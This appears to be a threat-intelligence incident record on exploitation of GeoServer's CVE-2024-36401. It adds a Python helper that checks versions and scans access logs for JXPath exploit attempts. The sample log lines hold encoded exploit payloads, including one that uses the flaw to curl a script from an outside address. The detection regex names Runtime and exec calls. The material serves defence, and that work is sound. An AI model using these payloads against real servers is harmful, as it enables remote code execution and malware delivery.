Multiple threat actors exploited CVE-2024-36401, an unauthenticated remote code execution flaw in the GeoTools library that GeoServer uses to evaluate property names in OGC requests (the names were passed to Apache Commons JXPath as XPath expressions, which can invoke arbitrary Java methods). The resulting malware campaigns delivered cryptocurrency miners, botnet clients, and the SideWalk backdoor. Targeted entities include IT service providers in India, US technology firms, Belgian government bodies, and telecom companies in Thailand and Brazil. Successful exploitation gave the attackers persistent remote access, data exfiltration, and further payload deployment, with the potential for widespread disruption across the targeted regions and industries. The flaw was fixed in GeoServer 2.23.6, 2.24.4 and 2.25.2 and was added to CISA's Known Exploited Vulnerabilities catalog; the flexibility of open-source components has to be matched by strict security measures, above all timely patching and detection coverage for exploitation attempts against the exposed service.
Source: https://securityaffairs.com/168197/malware/geoserver-geotools-flaw-cve-2024-36401-malware.html
TPRM report: https://scoringcyber.rankiteo.com/company/geosolutionsgroup
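Added example (not code from Security Affairs, Fortinet, the GeoServer project, or the TPRM report): a small triage helper for the two checks a responder would want after reading the summary above. The version check compares a GeoServer version string against the releases that shipped the fix (2.23.6, 2.24.4, 2.25.2, per the GeoServer advisory). The log scan walks web-server access-log lines in the common combined format and flags OGC requests whose query parameters carry a JXPath method call such as exec(java.lang.Runtime.getRuntime(), ...), the pattern the public exploit uses; the assumption that exploit attempts use that call shape, the combined log format, and all sample log lines below are constructed for the example. One caveat is baked in: GET requests only. Exploitation over a POST body (XML WFS/WPS requests) never appears in an access log and needs proxy or WAF body logging.

```python
"""Triage helpers for CVE-2024-36401 exposure (added example, not project code)."""
import re
from urllib.parse import parse_qs, unquote_plus

# First patched micro release per 2.x minor branch (GeoServer advisory):
# 2.23.6, 2.24.4, 2.25.2. Older branches were EOL and never received the fix.
FIXED_MICRO = {23: 6, 24: 4, 25: 2}


def parse_version(version):
    """'2.24.3' -> (2, 24, 3); raises on anything that is not major.minor.micro."""
    m = re.match(r"^\s*(\d+)\.(\d+)\.(\d+)", version)
    if not m:
        raise ValueError(f"unrecognised GeoServer version: {version!r}")
    return tuple(int(x) for x in m.groups())


def is_vulnerable(version):
    """True when the given GeoServer release predates the fix on its branch."""
    major, minor, micro = parse_version(version)
    if major < 2:
        return True          # pre-2.x releases never got the fix
    if major > 2 or minor > 25:
        return False         # branches released after the fix
    if minor < 23:
        return True          # EOL 2.x branches, unpatched
    return micro < FIXED_MICRO[minor]


# Combined log format: ip ident user [ts] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)
# JXPath extension-function call shapes used to reach java.lang.Runtime.
# Assumption: exploit traffic follows the public PoC pattern.
JXPATH_CALL = re.compile(
    r"java\.lang\.Runtime|getRuntime\s*\(|ProcessBuilder|javax\.script|\bexec\s*\(",
    re.I,
)
OGC_PATH = re.compile(r"/geoserver/", re.I)


def fully_decode(value, limit=3):
    """Strip repeated percent-encoding layers so nested encoding does not hide a call."""
    for _ in range(limit):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Return (param, decoded_value) for the first query parameter holding a JXPath call."""
    path, _, query = target.partition("?")
    if not OGC_PATH.search(path):
        return None
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for v in values:                       # parse_qs already decoded one layer
            decoded = fully_decode(v)
            if JXPATH_CALL.search(decoded):
                return key, decoded
    return None


def scan_access_log(lines):
    """Yield one dict per GET request that looks like a CVE-2024-36401 attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue                           # malformed or truncated line
        found = classify_request(m["target"])
        if found:
            param, payload = found
            hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                         "param": param, "payload": payload})
    return hits


# Constructed sample lines (RFC 5737 test addresses), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jul/2024:12:03:11 +0000] "GET /geoserver/wfs?service=WFS&version=2.0.0'
    '&request=GetPropertyValue&typeNames=sf:archsites'
    '&valueReference=exec%28java.lang.Runtime.getRuntime%28%29%2C%27id%27%29 HTTP/1.1" 200 512 "-" "curl/8.0.1"',
    '198.51.100.4 - - [10/Jul/2024:12:03:12 +0000] "GET /geoserver/wfs?service=WFS&version=1.0.0'
    '&request=GetFeature&typeName=sf:archsites&propertyName=the_geom HTTP/1.1" 200 9001 "-" "QGIS/3.28"',
    '203.0.113.9 - - [10/Jul/2024:12:04:40 +0000] "POST /geoserver/wfs HTTP/1.1" 500 214 "-" "python-requests/2.31"',
    '203.0.113.9 - - [10/Jul/2024:12:04:41 +0000] "GET /geoserver/ows?service=WFS&version=2.0.0'
    '&request=GetPropertyValue&typeNames=topp:states&valueReference=exec%28java.lang.Runtime.getRuntime'
    '%28%29%2C%27curl+http%3A%2F%2F198.51.100.23%2Fx.sh+-o+%2Ftmp%2Fx%27%29 HTTP/1.1" 500 214 "-" "python-requests/2.31"',
    '192.0.2.77 - - [10/Jul/2024:12:05:02 +0000] "GET /wp-login.php HTTP/1.1" 404 153 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in ("2.22.5", "2.24.3", "2.24.4", "2.25.1", "2.25.2", "2.26.0"):
        print(f"{v}: {'VULNERABLE' if is_vulnerable(v) else 'patched'}")
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

The third sample line is the POST case: the access log records only the method and path, so nothing in the body is visible to this scan, which is why a hit count from access logs alone is a lower bound. Treat any hit as an attempted exploit regardless of HTTP status; a 500 from the endpoint does not mean the command failed to run.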
"id": "geo001091424",
"linkid": "geosolutionsgroup",
"type": "Vulnerability",
"date": "9/2024",
"severity": "100",
"impact": "5",
"explanation": "Attack threatening the organization’s existence"
{'affected_entities': [{'industry': 'Technology',
'location': 'India',
'type': 'IT Service Provider'},
{'industry': 'Technology',
'location': 'United States',
'type': 'Technology Firm'},
{'industry': 'Government',
'location': 'Belgium',
'type': 'Government Body'},
{'industry': 'Telecommunications',
'location': ['Thailand', 'Brazil'],
'type': 'Telecom Company'}],
'attack_vector': 'Remote Access',
'data_breach': {'data_exfiltration': True},
'description': 'Multiple threat actors exploited a GeoServer GeoTools flaw '
'(CVE-2024-36401), leading to malware campaigns delivering '
'cryptocurrency miners, bots, and the SideWalk backdoor. '
'Targeted entities include IT service providers in India, US '
'technology firms, Belgian government bodies, and telecom '
'companies in Thailand and Brazil. Exploits allowed persistent '
'remote access, data exfiltration, and payload deployment, '
'potentially causing widespread disruption across targeted '
'regions and industries. Open-source flexibility requires '
'strict security measures, including timely updates and threat '
'detection strategies to mitigate risks posed by such '
'vulnerabilities.',
'impact': {'data_compromised': True,
'operational_impact': 'Widespread Disruption',
'systems_affected': True},
'initial_access_broker': {'backdoors_established': True,
'entry_point': 'GeoServer GeoTools Flaw'},
'lessons_learned': 'Open-source flexibility requires strict security '
'measures, including timely updates and threat detection '
'strategies to mitigate risks posed by such '
'vulnerabilities.',
'motivation': ['Cryptocurrency Mining',
'Botnet Expansion',
'Backdoor Installation'],
'post_incident_analysis': {'root_causes': 'Exploitation of CVE-2024-36401'},
'title': 'GeoServer GeoTools Flaw Exploitation',
'type': 'Exploitation of Vulnerability',
'vulnerability_exploited': 'CVE-2024-36401'}